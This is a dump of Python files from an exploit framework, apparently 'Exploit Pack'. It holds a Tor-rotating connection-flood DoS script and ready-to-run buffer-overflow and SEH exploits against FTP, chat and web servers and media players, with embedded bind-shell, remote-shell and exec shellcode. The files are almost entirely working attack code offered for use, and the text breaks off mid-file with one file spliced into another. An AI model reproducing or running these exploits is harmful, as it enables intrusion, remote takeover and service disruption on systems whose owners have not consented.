1 | # Copyright - Exploit Pack 2012
2 | #
3 | import socket, os, sys, time
4 |
5 | CONNECTIONS = 8
6 | THREADS = 48
7 |
8 | def make_socket(host,port):
9 | for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM, 0, socket.AI_PASSIVE):
10 | af, socktype, proto, canonname, sa = res
11 | try:
12 | s = socket.socket(af, socktype, proto)
13 | except socket.error, msg:
14 | s = None
15 | continue
16 | try:
17 | s.connect(sa)
18 | except socket.error, msg:
19 | s.close()
20 | s = None
21 | continue
22 | break
23 | if s is None:
24 | print 'could not open socket'
25 | sys.exit(0)
26 | print 'Connected by', host, port
27 | return s
28 |
29 | def attack(host, port, id):
30 | sockets = []
31 | for x in range(CONNECTIONS):
32 | sockets.insert(x,0)
33 | while True:
34 | for x in range(CONNECTIONS):
35 | if not sockets[x]:
36 | sockets[x] = make_socket(host,port)
37 | try:
38 | sockets[x].send("\0")
39 | print "[" + str(id) + ": Shake that child]\n"
40 | except socket.error:
41 | sockets[x].close()
42 | sockets[x] = make_socket(host,port)
43 | print "[" + str(id) +": Shake that child]\n"
44 | time.sleep(300000/1000000.0)
45 |
46 |
47 |
48 |
49 | def cycle_identity():
50 | socket = make_socket("localhost", "9050")
51 | socket.write("AUTHENTICATE \"\"\n")
52 | while True:
53 | socket.write("signal NEWNYM\n\x00")
54 | print "[" + str(socket) + ": cycle_identity -> signal NEWNYM\n"
55 | time.sleep(300000/1000000.0)
56 |
57 | def main():
58 | if len(sys.argv) != 3:
59 | cycle_identity()
60 | for x in range(THREADS):
61 | from multiprocessing import Process
62 | p = Process(target=attack, args=(sys.argv[1],int(sys.argv[2]),x))
63 | p.start()
64 | time.sleep(200000/1000000.0)
65 | return 0
66 |
67 | if __name__ == "__main__":
68 | main()
69 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/EasyFTPServer1.7.11.py:
--------------------------------------------------------------------------------
1 | # Script Author: Karn Ganeshen
2 | # Thanks for let us use this script on Exploit Pack
3 |
4 | import socket
5 | import sys
6 |
7 | Target = sys.argv[1]
8 | Port = int(sys.argv[2])
9 | ShellcodeType = sys.argv[3]
10 |
11 | BufferSize = 268
12 |
13 | remoteshell =("\x89\xE5"
14 | "\x83\xC4\xEC\x33\xC0\x50\x50\x50\x6A\x06"
15 | "\x6A\x01\x6A\x02\xB8"
16 | "\x6A\x8B\xAB\x71"
17 | "\xFF\xD0\x8B\xD8\x33\xC0\x89\x45\xF4\xB0"
18 | "\x02\x66\x89\x45\xF0\x66\xC7\x45\xF2\xE5"
19 | "\xC5\x6A\x10\x8D\x55\xF0\x52\x53\xB8"
20 | "\x80\x44\xAB\x71"
21 | "\xFF\xD0\x6A\x01\x53\xB8"
22 | "\xD3\x8C\xAB\x71"
23 | "\xFF\xD0\x33\xC0\x50\x50\x53\xB8"
24 | "\x40\x10\xAC\x71"
25 | "\xFF\xD0\x8B\xD8\xBA"
26 | "\x63\xD3\x81\x7C"
27 | "\x53\x6A\xF6\xFF\xD2\x53\x6A\xF5\xFF\xD2"
28 | "\x53\x6A\xF4\xFF\xD2\xC7\x45\xFB\x41\x63"
29 | "\x6D\x64\x8D\x45\xFC\x50\xB8"
30 | "\xC7\x93\xC2\x77"
31 | "\xFF\xD0"
32 | "\x31\xC0\x50\xB8"
33 | "\xFA\xCA\x81\x7C"
34 | "\xFF\xD0")
35 |
36 | executecode=("\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1"
37 | "\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5"
38 | "\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69"
39 | "\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e"
40 | "\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8"
41 | "\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08"
42 | "\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c"
43 | "\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c"
44 | "\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80"
45 | "\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b"
46 | "\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84"
47 | "\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14"
48 | "\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c"
49 | "\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e"
50 | "\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8"
51 | "\x51\x6b\x28")
52 |
53 | if ShellcodeType == "R":
54 | Shellcode=remoteshell
55 | if ShellcodeType == "E":
56 | Shellcode=executecode
57 | if ShellcodeType == "C":
58 | Shellcode=executecode
59 | if ShellcodeType == "L":
60 | Shellcode=executecode
61 |
62 | eip = "\x91\xC8\x41\x7E" # CALL EDI - user32.dll
63 |
64 | nops = "\x90" * (BufferSize-len(Shellcode))
65 |
66 | def ExploitEasyFTP(Target, Port):
67 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
68 | connect = s.connect((Target, Port))
69 | s.recv(1024)
70 | s.send('User anonymous\r\n')
71 | s.recv(1024)
72 | s.send('PASS anonymous\r\n')
73 | s.send('CWD '+ nops + Shellcode + eip + '\r\n')
74 | s.recv(1024)
75 | s.send('QUIT ftp\r\n')
76 | s.close()
77 |
78 |
79 |
80 | ExploitEasyFTP(Target, Port)
81 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/Example.py:
--------------------------------------------------------------------------------
1 | #Exploit Pack - Security Framework for Exploit Developers
2 | #Copyright 2011 Juan Sacco http://exploitpack.com
3 | #
4 | #This program is free software: you can redistribute it and/or modify it under the terms of the
5 | #GNU General Public License as published by the Free Software Foundation, either version 3
6 | #or any later version.
7 | #
8 | #This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
9 | #without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
10 | #PURPOSE. See the GNU General Public License for more details.
11 | #
12 | #You should have received a copy of the GNU General Public License along with this program.
13 | #If not, see http://www.gnu.org/licenses/
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/ExploitAudiotran.py:
--------------------------------------------------------------------------------
1 | #Audiotran 1.4.2.4 SEH Overflow Exploit 0 day
2 | #Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
3 | #Web - http://www.aslitsecurity.com/
4 | #Blog - http://www.aslitsecurity.blogspot.com/
5 | #Download Vulnerable application from http://www.e-soft.co.uk/Audiotran.htm
6 | #Vulnerable version Audiotran 1.4.2.4
7 | #Tested on XP SP2
8 | #Greets Villy, Puneet Jain, Abhishek Sahni and ASL IT SECURITY TEAM
9 | #!/usr/bin/python
10 | #To load the playlist file in audiotran copy the ASL.pls
11 | #file in C:\Program Files\Audiotran and click on
12 | #load playlist and doubleclick on ASL.pls
13 |
14 | import sys
15 | import os
16 | # En este exploit no se usa el argv1
17 | host = sys.argv[1]
18 | # En este exploit no se usa el argv2
19 | port = int(sys.argv[2])
20 | shellcodetosend = int(sys.argv[3])
21 |
22 | #windows/exec - CMD=calc.exe
23 | inofensivo = ("\xDB\xDF\xD9\x74\x24\xF4\x58\x2B\xC9\xB1\x33\xBA"
24 | "\x4C\xA8\x75\x76\x83\xC0\x04\x31\x50\x13\x03\x1C\xBB\x97\x83\x60"
25 | "\x53\xDE\x6C\x98\xA4\x81\xE5\x7D\x95\x93\x92\xF6\x84\x23\xD0\x5A"
26 | "\x25\xCF\xB4\x4E\xBE\xBD\x10\x61\x77\x0B\x47\x4C\x88\xBD\x47\x02"
27 | "\x4A\xDF\x3B\x58\x9F\x3F\x05\x93\xD2\x3E\x42\xC9\x1D\x12\x1B\x86"
28 | "\x8C\x83\x28\xDA\x0C\xA5\xFE\x51\x2C\xDD\x7B\xA5\xD9\x57\x85\xF5"
29 | "\x72\xE3\xCD\xED\xF9\xAB\xED\x0C\x2D\xA8\xD2\x47\x5A\x1B\xA0\x56"
30 | "\x8A\x55\x49\x69\xF2\x3A\x74\x46\xFF\x43\xB0\x60\xE0\x31\xCA\x93"
31 | "\x9D\x41\x09\xEE\x79\xC7\x8C\x48\x09\x7F\x75\x69\xDE\xE6\xFE\x65"
32 | "\xAB\x6D\x58\x69\x2A\xA1\xD2\x95\xA7\x44\x35\x1C\xF3\x62\x91\x45"
33 | "\xA7\x0B\x80\x23\x06\x33\xD2\x8B\xF7\x91\x98\x39\xE3\xA0\xC2\x57"
34 | "\xF2\x21\x79\x1E\xF4\x39\x82\x30\x9D\x08\x09\xDF\xDA\x94\xD8\xA4"
35 | "\x05\x77\xC9\xD0\xAD\x2E\x98\x59\xB0\xD0\x76\x9D\xCD\x52\x73\x5D"
36 | "\x2A\x4A\xF6\x58\x76\xCC\xEA\x10\xE7\xB9\x0C\x87\x08\xE8\x6E\x46"
37 | "\x9B\x70\x5F\xED\x1B\x12\x9F")
38 |
39 | # Shellcode port 58821
40 | ofensivo=("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
41 | "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
42 | "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
43 | "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
44 | "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
45 | "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
46 | "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
47 | "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
48 | "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
49 | "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
50 | "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
51 | "\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
52 | "\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
53 | "\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x31" +
54 | "\xdb\x53\x68\x02\x00\xe5\xc5\x89\xe6\x6a\x10\x56\x57\x68" +
55 | "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff" +
56 | "\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7" +
57 | "\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" +
58 | "\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44" +
59 | "\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56" +
60 | "\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86" +
61 | "\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60" +
62 | "\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5" +
63 | "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f" +
64 | "\x6a\x00\x53\xff\xd5")
65 |
66 |
67 | if shellcodetosend == 1:
68 | shellcodetosend=ofensivo
69 | else:
70 | shellcodetosend=inofensivo
71 |
72 | padding = 'A' * 1308
73 | shortjump = "\xeb\x06\x90\x90"
74 | ret = "\xcb\x75\x52\x73" # ret at 0x735275CB [msvbvm60.dll]
75 | payload = "\x90" * (9255-len(shellcodetosend)) + shellcodetosend
76 | evilbuff = padding + shortjump + ret + payload
77 |
78 | path = 'exploits/code/output/exploit.pls'
79 | f = open(path,mode='wb')
80 | f.write(evilbuff)
81 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/ExploitBIGAntServer.py:
--------------------------------------------------------------------------------
1 | import socket, sys
2 |
3 | host = sys.argv[1]
4 | port = int(sys.argv[2]) # port 6660 by default
5 |
6 | # windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
7 | # EXITFUNC=seh, LPORT=4444, RHOST=
8 | shellcode = (
9 | "\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
10 | "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
11 | "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
12 | "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
13 | "\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b"
14 | "\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x46\x44\x4c\x4b"
15 | "\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a"
16 | "\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51"
17 | "\x4a\x4b\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
18 | "\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37"
19 | "\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
20 | "\x4b\x50\x54\x46\x44\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f"
21 | "\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
22 | "\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
23 | "\x4d\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49"
24 | "\x4b\x43\x54\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30\x44\x4c"
25 | "\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
26 | "\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
27 | "\x4e\x36\x45\x36\x46\x33\x43\x56\x45\x38\x47\x43\x46\x52\x42"
28 | "\x48\x43\x47\x42\x53\x46\x52\x51\x4f\x50\x54\x4b\x4f\x48\x50"
29 | "\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48"
30 | "\x56\x51\x4f\x4d\x59\x4b\x55\x45\x36\x4b\x31\x4a\x4d\x43\x38"
31 | "\x45\x52\x46\x35\x43\x5a\x45\x52\x4b\x4f\x48\x50\x45\x38\x49"
32 | "\x49\x44\x49\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56\x51\x43"
33 | "\x51\x43\x51\x43\x51\x43\x46\x33\x51\x53\x50\x53\x47\x33\x51"
34 | "\x43\x4b\x4f\x4e\x30\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36"
35 | "\x46\x33\x4b\x39\x4d\x31\x4c\x55\x45\x38\x4e\x44\x44\x5a\x42"
36 | "\x50\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x44\x50\x50\x51"
37 | "\x50\x55\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
38 | "\x49\x46\x37\x4b\x4f\x4e\x36\x50\x53\x46\x35\x4b\x4f\x48\x50"
39 | "\x43\x58\x4b\x55\x47\x39\x4c\x46\x50\x49\x46\x37\x4b\x4f\x48"
40 | "\x56\x46\x30\x50\x54\x50\x54\x46\x35\x4b\x4f\x4e\x30\x4c\x53"
41 | "\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x50\x57\x4b\x4f\x48"
42 | "\x56\x51\x45\x4b\x4f\x4e\x30\x42\x46\x43\x5a\x42\x44\x42\x46"
43 | "\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x43\x5a\x46\x30\x51"
44 | "\x49\x51\x39\x48\x4c\x4d\x59\x4d\x37\x42\x4a\x51\x54\x4b\x39"
45 | "\x4a\x42\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
46 | "\x4d\x4b\x4e\x50\x42\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
47 | "\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x42"
48 | "\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
49 | "\x51\x42\x50\x51\x46\x31\x50\x51\x43\x5a\x43\x31\x50\x51\x50"
50 | "\x51\x51\x45\x50\x51\x4b\x4f\x48\x50\x42\x48\x4e\x4d\x48\x59"
51 | "\x45\x55\x48\x4e\x50\x53\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b"
52 | "\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
53 | "\x48\x44\x45\x34\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x45"
54 | "\x38\x4a\x50\x4d\x5a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
55 | "\x4b\x4f\x4e\x30\x41\x41")
56 |
57 |
58 | payload = "\x41" * 985 # seh overwritten at 989
59 | next_seh = "\xeb\x06\x90\x90" # short jump 6 bytes
60 | seh = "\x6a\x19\x9a\x0f" # p/p/r from vbajet32.dll
61 | nops = "\x90" * 10 # nop sled
62 | sc = shellcode # 710 bytes available for shellcode
63 |
64 | print "\n[*] BigAnt Server v2.50 SEH Overwrite 0day"
65 | print "[*] Written and discovered by Blake"
66 | print "[*] Tested on Windows XP SP3\n"
67 |
68 | print "[+] Connecting to %s on port %d" % (host,port)
69 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
70 | try:
71 | s.connect((host,port))
72 | except:
73 | print "[x] Error establishing connection\n"
74 | sys.exit(0)
75 |
76 | print "[+] Sending payload"
77 | s.send("GET " + payload + next_seh + seh + nops + sc + "\r\n\r\n")
78 | s.close()
79 | print "[+] Connect to bind shell on port 4444\n"
80 |
81 | # milw0rm.com [2009-09-15]
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/ExploitQuickPlayer.py:
--------------------------------------------------------------------------------
1 | #TYPE: Clientside
2 | #PORT: NO
3 | #SERVICES: NO
4 |
5 | # Modificado para INSECT Pro por Juan Sacco
6 |
7 | import sys
8 | import os
9 | # En este exploit no se usa el argv1
10 | host = sys.argv[1]
11 | # En este exploit no se usa el argv2
12 | port = int(sys.argv[2])
13 | ShellcodeType = sys.argv[3]
14 |
15 | # windows\exec calc.exe unicode uppercase shellcode
16 | executecode=("PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAP"
17 | "AZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB3Y9R8Z9L8Y2RJT1N0V0Y0I0I0I0I0"
18 | "I0I0I0I0I0I0C0C0C0C0C0C070Q0Z1Z110X0P001100112K11110Q02110B020B0B000B0B110B0X0P0"
19 | "8110B2U0J0I0I2L0M080N1Y0E0P0G2P0C000Q2P0K090K0U0E1Q0H0R0B0D0L0K0B2R0P000L0K0F020"
20 | "F2L0L0K0C1R0G1T0N2K0Q1R0D1X0D0O0L2W0C2Z0E2V0E1Q0I2O0F0Q0K2P0L2L0E2L0Q2Q0C0L0E0R0"
21 | "D2L0G0P0O010J2O0D0M0G2Q0K2W0I2R0H2P0P0R0C1W0N2K0B2R0B000L0K0P0B0G0L0G2Q0H0P0N2K0"
22 | "C2P0Q1X0K050K2P0P2T0Q0Z0E0Q0H0P0B2P0N2K0C2X0F2X0L0K0B2X0E2P0E0Q0N030I2S0G0L0P0I0"
23 | "N2K0G0D0N2K0F1Q0I0F0P010I2O0E1Q0O000L2L0J1Q0H0O0F2M0C010O070G0H0K0P0B0U0L040E0S0"
24 | "C0M0K0H0E2K0Q2M0Q040P2U0K0R0P0X0N2K0F080G0T0C010I0C0E060N2K0F2L0B2K0N2K0B2X0G2L0"
25 | "C010K1S0N2K0G2T0L0K0C010H0P0L0I0Q0T0D1T0E2T0C2K0C2K0P1Q0B2Y0P0Z0P0Q0I2O0K0P0C1X0"
26 | "C2O0C1Z0N2K0F2R0H2K0L0F0C2M0B0J0E0Q0N2M0N1U0O0I0G2P0C000E0P0B2P0Q2X0P010N2K0P2O0"
27 | "O2W0K0O0J2U0M2K0J0P0N0U0I020F060E080N0F0L0U0O0M0M0M0K0O0I0E0E2L0F1V0Q2L0F1Z0M0P0"
28 | "K0K0M000Q1U0G2U0O0K0P0G0D0S0Q1R0P2O0P1Z0C000Q0C0K0O0J2U0E030C0Q0P2L0E030D2N0B0E0"
29 | "D080Q2U0C000E0Z1111KPA")
30 |
31 | if ShellcodeType == "R":
32 | Shellcode=remoteshell
33 | if ShellcodeType == "E":
34 | Shellcode=executecode
35 | if ShellcodeType == "C":
36 | Shellcode=executecode
37 | if ShellcodeType == "L":
38 | Shellcode=executecode
39 |
40 | #header
41 | head = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0D\x0A\x46\x69\x6C\x65\x31\x3D"
42 |
43 | junk = "\x41" * 530
44 | junk += "\x61\x62\x41\x4a\x58\x6d\x05\x21\x11\x6d\x2d\x20\x11\x6d\x50\x6d\xc3"
45 | junk += "\x41" * 111
46 |
47 | padding = "\x90" * (20000-len(junk+Shellcode))
48 |
49 | evilbuff = head + junk + Shellcode + padding
50 |
51 | path = 'exploits/code/output/exploit.m3u'
52 | f = open(path,mode='wb')
53 | f.write(evilbuff)
54 | f.close()
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/FreeFloatFTPServer.py:
--------------------------------------------------------------------------------
1 | # Script Author: Shahin
2 | # Thanks for let us use this script on Exploit Pack
3 |
4 | import socket, sys
5 | from struct import pack
6 |
7 |
8 | if len(sys.argv) != 3:
9 | sys.exit(0)
10 |
11 | target = sys.argv[1]
12 | port = int(sys.argv[2])
13 |
14 | # 728 bytes for shellcode
15 | #Bind Shell shellcode port 4444
16 | shellcode = ("\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
17 | "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
18 | "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
19 | "\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07"
20 | "\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e"
21 | "\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f"
22 | "\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38"
23 | "\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65"
24 | "\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a"
25 | "\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74"
26 | "\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5"
27 | "\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80"
28 | "\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4"
29 | "\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80"
30 | "\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82"
31 | "\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a"
32 | "\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70"
33 | "\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6"
34 | "\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4"
35 | "\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6"
36 | "\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4"
37 | "\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53"
38 | "\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84"
39 | "\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51"
40 | "\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a")
41 |
42 | buffer = "\x41" * 230
43 | eip = pack(' calc.exe
13 | shellcode =(
14 | "\xb8\xe8\xaa\x5e\xc0\xdb\xd6\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
15 | "\x33\x31\x43\x12\x03\x43\x12\x83\x03\x56\xbc\x35\x2f\x4f\xc8"
16 | "\xb6\xcf\x90\xab\x3f\x2a\xa1\xf9\x24\x3f\x90\xcd\x2f\x6d\x19"
17 | "\xa5\x62\x85\xaa\xcb\xaa\xaa\x1b\x61\x8d\x85\x9c\x47\x11\x49"
18 | "\x5e\xc9\xed\x93\xb3\x29\xcf\x5c\xc6\x28\x08\x80\x29\x78\xc1"
19 | "\xcf\x98\x6d\x66\x8d\x20\x8f\xa8\x9a\x19\xf7\xcd\x5c\xed\x4d"
20 | "\xcf\x8c\x5e\xd9\x87\x34\xd4\x85\x37\x45\x39\xd6\x04\x0c\x36"
21 | "\x2d\xfe\x8f\x9e\x7f\xff\xbe\xde\x2c\x3e\x0f\xd3\x2d\x06\xb7"
22 | "\x0c\x58\x7c\xc4\xb1\x5b\x47\xb7\x6d\xe9\x5a\x1f\xe5\x49\xbf"
23 | "\x9e\x2a\x0f\x34\xac\x87\x5b\x12\xb0\x16\x8f\x28\xcc\x93\x2e"
24 | "\xff\x45\xe7\x14\xdb\x0e\xb3\x35\x7a\xea\x12\x49\x9c\x52\xca"
25 | "\xef\xd6\x70\x1f\x89\xb4\x1e\xde\x1b\xc3\x67\xe0\x23\xcc\xc7"
26 | "\x89\x12\x47\x88\xce\xaa\x82\xed\x21\xe1\x8f\x47\xaa\xac\x45"
27 | "\xda\xb7\x4e\xb0\x18\xce\xcc\x31\xe0\x35\xcc\x33\xe5\x72\x4a"
28 | "\xaf\x97\xeb\x3f\xcf\x04\x0b\x6a\xac\xcb\x9f\xf6\x1d\x6e\x18"
29 | "\x9c\x61")
30 |
31 | # 32 byte egghunter
32 | egghunter =(
33 | "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
34 | "\x54\x30\x30\x57" # egg - W00T
35 | "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
36 |
37 | egg = "\x54\x30\x30\x57\x54\x30\x30\x57"
38 | buffer = "\x90" * (271 - len(egg + shellcode))
39 | eip = "\x13\x44\x87\x7c" # 7C874413 JMP ESP - kernel32.dll
40 | nops = "\x90" * 8
41 |
42 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
43 | try:
44 | s.connect((target,port))
45 | s.send("USER blake \r\n")
46 | s.recv(1024)
47 | s.send("PASS " + buffer + egg + shellcode + eip + nops + egghunter + "\r\n")
48 | s.recv(1024)
49 | s.close()
50 | except:
51 | sys.exit(0)
52 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/SavantWebServer.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import socket
3 |
4 | target_address=sys.argv[1]
5 | target_port=int(sys.argv[2])
6 |
7 |
8 | buffer2 = "R0cX" + "R0cX"
9 | # msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c
10 | buffer2 += ("\xbd\xec\x37\x93\x4b\xdb\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
11 | "\x6a\x83\xc0\x04\x31\x68\x10\x03\x68\x10\x0e\xc2\x4a\xa1\x17"
